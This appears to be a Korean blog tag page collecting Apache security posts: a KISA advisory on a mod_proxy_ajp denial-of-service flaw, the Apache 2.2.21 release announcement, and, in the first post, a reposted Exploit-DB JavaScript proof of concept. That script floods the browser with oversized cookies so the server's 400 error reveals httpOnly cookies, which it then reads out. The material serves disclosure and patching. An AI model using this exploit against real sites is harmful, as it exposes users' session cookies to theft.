'apache'에 해당되는 글 20건
- 2012/02/03 Apache httpOnly Cookie Disclosure
- 2011/09/16 Apache서버 서비스 거부 취약점 보안업데이트 권고
- 2011/09/13 Apache 웹서버 서비스 거부 취약점 보안업데이트
|
// Source: https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08 |
// Most browsers limit cookies to 4k characters, so we need multiple |
function setCookies (good) { |
// Construct string for cookie value |
var str = ""; |
for (var i=0; i< 819; i++) { |
str += "x"; |
} |
// Set cookies |
for (i = 0; i < 10; i++) { |
// Expire evil cookie |
if (good) { |
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;"; |
} |
// Set evil cookie |
else { |
var cookie = "xss"+i+"="+str+";path=/"; |
} |
document.cookie = cookie; |
} |
} |
function makeRequest() { |
setCookies(); |
function parseCookies () { |
var cookie_dict = {}; |
// Only react on 400 status |
if (xhr.readyState === 4 && xhr.status === 400) { |
// Replace newlines and match <pre> content |
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/); |
if (content.length) { |
// Remove Cookie: prefix |
content = content[1].replace("Cookie: ", ""); |
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g); |
// Add cookies to object |
for (var i=0; i<cookies.length; i++) { |
var s_c = cookies[i].split('=',2); |
cookie_dict[s_c[0]] = s_c[1]; |
} |
} |
// Unset malicious cookies |
setCookies(true); |
alert(JSON.stringify(cookie_dict)); |
} |
} |
// Make XHR request |
var xhr = new XMLHttpRequest(); |
xhr.onreadystatechange = parseCookies; |
xhr.open("GET", "/", true); |
xhr.send(null); |
} |
makeRequest(); |
출처 : Exploit-DB
□ 개요
o Apache웹서버에 원격 서비스거부(Denial of Service) 공격 가능한 신규 취약점이 발견됨 [1]
o 공격자는 mod_proxy_ajp와 ‘mod_proxy_balancer모듈이 같이 사용되는 아파치 서버 환경에서
특수하게 조작된 HTTP패킷을 전송할 경우, 서비스 거부를 발생시킬 수 있음
□ 해당 시스템
o 영향 받는 소프트웨어 [1]
- Apache 2.2.20 및 이전 버전
※ 자세한 버전은 참고사이트 참조
□ 해결방안
o 취약한 버전을 운용하고있는 웹서버 관리자는 Apache 2.2.21버전으로 업데이트[3]
※ Apache 1.3버전의 경우 업데이트 지원이 중단되었으므로, 해당 버전 운용자는2.2.21버전으로
업그레이드 권고
□ 용어 정리
o Apache : WWW(World Wide Web)서버 소프트웨어
o mod_proxy : Apache 프록시/게이트웨이 기능을 구현하는 모듈
o mod_proxy_ajp : mod_proxy에서 AJP(Apache JServ Protocol)를 지원하는 모듈
o mod_proxy_balancer : 부하분산을 위한 mod_proxy확장 모듈
□ 기타 문의사항
o 한국인터넷진흥원 인터넷침해대응센터: 국번없이 118
[참고사이트]
[1] http://secunia.com/advisories/46013/
[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3348
[3] http://httpd.apache.org/download.cgi
AJP,
apache,
Apache JServ Protocol,
Denial of Service,
hi.pe.kr,
HTTP,
mod_proxy,
mod_proxy_ajp,
mod_proxy_balancer,
게이트웨이,
물고기,
보안업데이트,
부하분산,
서버구축,
서비스거부공격,
웹서버,
취약점,
패킷조작,
프록시
□ 개요 □ 해당 시스템 □ 해결방안 □ 용어 정리 □ 기타 문의사항 [참고사이트] |
출처 : 인터넷침해대응센터
Apache HTTP Server 2.2.21 Released
The Apache Software Foundation and the Apache HTTP Server Project are
pleased to announce the release of version 2.2.21 of the Apache HTTP
Server ("Apache"). This version of Apache is principally a security
and bug fix release:
* SECURITY: CVE-2011-3348 (cve.mitre.org)
mod_proxy_ajp when combined with mod_proxy_balancer: Prevents
unrecognized HTTP methods from marking ajp: balancer members
in an error state, avoiding denial of service.
* SECURITY: CVE-2011-3192 (cve.mitre.org)
core: Further fixes to the handling of byte-range requests to use
less memory, to avoid denial of service. This patch includes fixes
to the patch introduced in release 2.2.20 for protocol compliance,
as well as the MaxRanges directive.
Note the further advisories on the state of CVE-2011-3192 will no longer
be broadcast, but will be kept up to date at;
http://httpd.apache.org/security/CVE-2011-3192.txt
We consider this release to be the best version of Apache available, and
encourage users of all prior versions to upgrade.
Apache HTTP Server 2.2.21 is available for download from:
http://httpd.apache.org/download.cgi
Please see the CHANGES_2.2 file, linked from the download page, for a
full list of changes. A condensed list, CHANGES_2.2.21 provides the
complete list of changes since 2.2.19. A summary of all of the security
vulnerabilities addressed in this and earlier releases is available:
http://httpd.apache.org/security/vulnerabilities_22.html
This release includes the Apache Portable Runtime (APR) version 1.4.5
and APR Utility Library (APR-util) version 1.3.12, bundled with the tar
and zip distributions. The APR libraries libapr and libaprutil (and
on Win32, libapriconv version 1.2.1) must all be updated to ensure
binary compatibility and address many known security and platform bugs.
Apache 2.2 offers numerous enhancements, improvements, and performance
boosts over the 2.0 codebase. For an overview of new features
introduced since 2.0 please see:
http://httpd.apache.org/docs/2.2/new_features_2_2.html
This release builds on and extends the Apache 2.0 API. Modules written
for Apache 2.0 will need to be recompiled in order to run with Apache
2.2, and require minimal or no source code changes.
http://svn.apache.org/repos/asf/httpd/httpd/branches/2.2.x/VERSIONING
When upgrading or installing this version of Apache, please bear in mind
that if you intend to use Apache with one of the threaded MPMs (other
than the Prefork MPM), you must ensure that any modules you will be
using (and the libraries they depend on) are thread-safe.
Prev
Facebook
